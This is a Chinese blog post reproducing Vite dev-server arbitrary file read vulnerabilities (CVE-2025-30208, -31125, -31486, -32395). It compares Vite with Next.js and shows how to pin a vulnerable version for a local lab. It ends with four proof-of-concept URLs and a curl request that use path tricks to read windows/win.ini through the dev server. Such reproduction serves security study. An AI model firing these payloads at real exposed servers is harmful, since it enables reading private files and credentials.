当前位置：首页 > news >正文

【漏洞复现】Vite 任意文件读取漏洞 CVE-2025-30208/CVE-2025-31125/CVE-2025-31486/CVE-2025-32395

news 来源：原创 2025/9/7 19:15:45

Vite是什么，和Next.js有什么区别？

我上一篇文章刚介绍了Next.js漏洞的复现：

【漏洞复现】Next.js中间件权限绕过漏洞 CVE-2025-29927_next.js 中间件权限绕过漏洞-CSDN博客

Vite 和 Next.js 是两个不同类型的前端工具，它们各自的用途、架构和适用场景有所不同。

Vite 是什么？

Vite 是一个现代前端构建工具，主要用于开发和打包前端项目（如 Vue、React 等）。它由 Vue 的作者 Evan You 开发，核心特点是快速启动、按需编译，并且基于 ES 模块（ESM）。

Vite 的主要特点：

开发速度快：使用原生 ES 模块（ESM），避免了 Webpack 传统的打包后运行模式，大幅加快冷启动速度。
按需编译：只在代码变更时实时更新（HMR 热更新），而不是重新编译整个应用。
默认支持 Vue 和 React：内置支持 Vue、React、TypeScript 等，无需额外配置。
轻量 & 插件化：基于 Rollup 进行生产构建，可扩展性强。

Vite 适用于构建前端 SPA（单页应用），并不包含服务端渲染（SSR）或全栈开发能力。

Next.js 是什么？

Next.js 是一个基于 React 的全栈框架，用于构建**服务器端渲染（SSR）和静态站点生成（SSG）的 Web 应用。它由 Vercel 开发，提供了完整的路由系统、API 路由、SSR/SSG、服务端组件（Server Components）**等功能。

Next.js 的主要特点：

支持 SSR & SSG：可以根据需求选择服务端渲染（SSR）、静态生成（SSG）或客户端渲染（CSR），优化页面加载速度和 SEO。
API 路由：可在 /api 目录下创建后端 API，无需单独搭建后端服务器。
自动代码拆分：按需加载页面代码，提升性能。
全栈能力：不仅是前端框架，还能处理后端逻辑（如数据库操作、身份验证等）。
支持 React Server Components：在服务器端直接渲染组件，减少客户端 JavaScript 负担。

Vite vs Next.js 的主要区别

特性	Vite	Next.js
类型	构建工具	全栈框架
适用范围	仅前端（SPA 开发）	全栈（前端 + 后端）
是否基于 React	不是，只是支持 React	是，专为 React 设计
开发体验	启动快，HMR 快速	需要 SSR/SSG 可能更复杂
SSR 支持	需要额外插件，如 Vite SSR	原生支持
API 路由	不支持	内置 `/api` 目录
SEO 友好性	仅支持 CSR（客户端渲染），SEO 依赖 prerender	原生支持 SEO（SSR/SSG）

如何选择？

如果你只想搭建一个前端应用（如 Vue、React SPA），推荐 Vite，开发体验更快。
如果你需要全栈开发（如 SSR、SSG、API 后端支持），推荐 Next.js，它是一个完整的 Web 框架。
如果你喜欢 React，但不需要 SSR，想用 Vite，可以考虑 Vite + React + React Router 作为替代方案。

如何使用Vite？

开始 | Vite 官方中文文档

漏洞环境搭建

选择一个漏洞版本，使用如下命令安装（示例）

#我的环境：windows+gitbash+npxnpx create-vite@6.1.1 vulnerable-project

安装完按照提示的命令进行

  cd vulnerable-projectnpm installnpm run dev

安装完发现一个问题：版本不对，这是配置问题，如果不做固定，会默认安装更高版本

如果没有发现版本问题，那么后续复现是出不来结果的

问题解决：在install命令之前通过修改package.json配置文件固定版本号

删除前面的脱字符^即可

删掉整个文件夹重新来一遍（或者删掉lock文件，重新install，都行），版本处于漏洞版本，环境搭建成功

漏洞复现

Vite任意文件读取漏洞，最近披露了多个CVE，如 CVE-2025-30208、CVE-2025-31125、CVE-2025-31486 和 CVE-2025-32395，从3月14日开始基本上是挖一个，修一个，再挖再修，主要涉及开发服务器在特定配置下的任意文件读取问题。

Vite 作为一个现代前端构建工具，因其快速开发体验和高效构建能力而广受欢迎，但近期披露的多个安全漏洞引发了社区的关注。 Vite 团队的快速响应和透明披露受到认可。未来，Vite 团队可能需要加强开发服务器的安全设计，减少类似漏洞的发生。

POC

由于我是windows环境，因此本文仅仅以windows环境做演示，以下POC仅适用windows

#CVE-2025-30208
http://localhost:5173/@fs/C://windows/win.ini?import&raw??
#CVE-2025-31125
http://localhost:5173/@fs/C://windows/win.ini?import&inline=1.wasm?init
#CVE-2025-31486
http://localhost:5173/@fs/C:/Users/Lenovo/vitetest/vulnerable-project/?/../../../../../windows/win.ini?import&?raw
#CVE-2025-32395
curl --request-target /@fs/Users/Lenovo/vitetest/vulnerable-project/#/../../../../../windows/win.ini http://localhost:5173